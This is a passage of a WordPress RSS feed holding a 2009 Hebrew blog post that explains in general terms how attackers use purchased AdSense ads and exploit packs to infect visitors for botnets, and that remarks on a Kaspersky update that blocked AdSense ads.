<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1186&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1186/feed</wfw:commentRss>
		<slash:comments>32</slash:comments>
		</item>
		<item>
		<title>&#8235;הדבקה ע&quot;י פרסומות? לא אם יש לך קספרסקי&#8236;</title>		<link>http://guym.co.il/1184?nucrss=1</link>
		<comments>http://guym.co.il/1184#comments</comments>
		<pubDate>Tue, 24 Nov 2009 14:26:01 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1184</guid>
		<description><![CDATA[&#8235;בזמן האחרון לא מעט גורמים מנסים (ולעיתים מצליחים) להדביק מחשבים ברוגלות ע&#34;י רכישת מודעות GOOGLE ADSENSE.
מה הרעיון?
נניח שאני רוצה להדביק מחשב שלכם כדי לייצר בוטנט. כפי שכתבתי בעבר, יש שוק לא קטן לרכישות כאלה ולעיתים משולם סכום נאה עבור הדבקות שכאלה.
כל מה שאני צריך לעשות הוא להקים אתר או לפרוץ לאתר ולייצר ממנו הדבקות. איך? [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1184&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>בזמן האחרון לא מעט גורמים מנסים (ולעיתים מצליחים) להדביק מחשבים ברוגלות ע&quot;י רכישת מודעות GOOGLE ADSENSE.</p>
<p>מה הרעיון?</p>
<p>נניח שאני רוצה להדביק מחשב שלכם כדי לייצר בוטנט. כפי שכתבתי בעבר, יש שוק לא קטן לרכישות כאלה ולעיתים משולם סכום נאה עבור הדבקות שכאלה.</p>
<p>כל מה שאני צריך לעשות הוא להקים אתר או לפרוץ לאתר ולייצר ממנו הדבקות. איך? ברגע שאתם נכנסים לאתר תרוץ חבילת אקספלויטים לדפדפן.</p>
<p>האתר מריץ עליכם JAVASCRIPT כשאתם נכנסים ומנסה להדביק אתכם ע&quot;י חולשות כאלה או אחרות (דוגמה אחת: מוריד לכם קובץ PDF נגוע ואם האקרובט שלכם לא מעודכן &#8211; נדבקתם).</p>
<p>אם אני מקבל על כל 1000 מחשבים מודבקים כמה עשרות דולרים אבל משלם כמה אחוזים מסנטים עבור כל נכנס לאתר, זה יכול להיות עסק לא רע. בייחוד אם אני מראש גונב את ה-ADSENSE ממישהו אחר (נניח ממחשבים שכבר הודבקו בבוט שלי שיש להם חשבון ADSENSE).</p>
<p>היתה כנראה פאשלה קטנה בקספרסקי (ניתן לקרוא <a href="http://www.haanchiang.com/kaspersky-blocking-google-adsense/" target="_blank">פה</a> <a href="http://www.avinashtech.com/anti-virus/adsense-hit-kaspersky-blocks/" target="_blank">ופה</a>) ואחד העדכונים שלהם חסם את הפרסומות של ADSENSE לחלוטין!</p>
<p>מעניין כמה עלתה ה&quot;פאשלה&quot; הקטנה הזאת <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>מעניין אם גוגל בתגובה יחסמו &quot;בטעות&quot; את האתר של קספרסקי <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1184&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1184/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
